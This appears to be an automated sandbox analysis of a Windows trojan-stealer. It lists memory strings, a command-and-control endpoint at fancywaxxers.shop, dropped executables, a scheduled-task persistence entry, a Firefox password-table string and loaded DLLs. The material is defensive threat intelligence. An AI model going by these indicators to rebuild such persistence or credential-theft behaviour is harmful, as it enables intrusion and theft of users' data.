Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/ah
Source: Dl6wuWiQdg.exe, 00000000.00000003.2208498531.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199107925.000000000081D000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2219903539.000000000081D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api$F
Source: Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apih
Source: Dl6wuWiQdg.exe, 00000000.00000003.2208795248.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235345701.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/hn7:C
Source: Dl6wuWiQdg.exe, 00000000.00000003.2208795248.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235345701.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/in
Source: Dl6wuWiQdg.exe, 00000000.00000003.2184395617.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2184484436.000000000083C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/api
Source: Dl6wuWiQdg.exe, 00000000.00000003.2219903539.000000000083D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/apiDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:
Source: Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Dl6wuWiQdg.exe, 00000000.00000003.2186181930.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: Dl6wuWiQdg.exe, 00000000.00000003.2186181930.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49742 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: Dl6wuWiQdg.exe	Static PE information: section name:
Source: Dl6wuWiQdg.exe	Static PE information: section name: .idata
Source: Dl6wuWiQdg.exe	Static PE information: section name:
Source: 8WYS1MQTL0QCOHKIPL8.exe.0.dr	Static PE information: section name:
Source: 8WYS1MQTL0QCOHKIPL8.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.5.dr	Static PE information: section name:
Source: skotes.exe.5.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 9_2_0079CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

9_2_0079CB97

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: 5_2_00D55C83	5_2_00D55C83
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: 5_2_00D5735A	5_2_00D5735A
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: 5_2_00D98860	5_2_00D98860
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: 5_2_00D54DE0	5_2_00D54DE0
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: 5_2_00D54B30	5_2_00D54B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007C8860	6_2_007C8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007C7049	6_2_007C7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007C78BB	6_2_007C78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007C31A8	6_2_007C31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00784B30	6_2_00784B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007C2D10	6_2_007C2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00784DE0	6_2_00784DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007B7F36	6_2_007B7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_007C779B	6_2_007C779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_007C8860	7_2_007C8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_007C7049	7_2_007C7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_007C78BB	7_2_007C78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_007C31A8	7_2_007C31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00784B30	7_2_00784B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_007C2D10	7_2_007C2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00784DE0	7_2_00784DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_007B7F36	7_2_007B7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_007C779B	7_2_007C779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007A6192	9_2_007A6192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_0078E530	9_2_0078E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007C8860	9_2_007C8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_00784B30	9_2_00784B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007C2D10	9_2_007C2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_00784DE0	9_2_00784DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007A0E13	9_2_007A0E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007C7049	9_2_007C7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007C31A8	9_2_007C31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007A1602	9_2_007A1602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007C779B	9_2_007C779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007C78BB	9_2_007C78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007A3DF1	9_2_007A3DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_007B7F36	9_2_007B7F36

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0079D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0079D942 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007980C0 appears 391 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0079DF80 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007B8E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0079D64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Code function: String function: 00D680C0 appears 130 times

Source: Dl6wuWiQdg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Dl6wuWiQdg.exe	Static PE information: Section: ZLIB complexity 0.9999229029605263
Source: Dl6wuWiQdg.exe	Static PE information: Section: ffxetdru ZLIB complexity 0.994471253583283

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@1/3

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

File created: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Dl6wuWiQdg.exe, 00000000.00000003.2157662713.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2175549687.00000000053EB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2175647181.00000000053DE000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2158045580.00000000053CA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Dl6wuWiQdg.exe	Virustotal: Detection: 56%
Source: Dl6wuWiQdg.exe	ReversingLabs: Detection: 60%

Source: Dl6wuWiQdg.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 8WYS1MQTL0QCOHKIPL8.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe

File read: C:\Users\user\Desktop\Dl6wuWiQdg.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Dl6wuWiQdg.exe "C:\Users\user\Desktop\Dl6wuWiQdg.exe"
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Process created: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe "C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe"
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Process created: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe "C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe	Section loaded: bcp47langs.dll	Jump to behavior
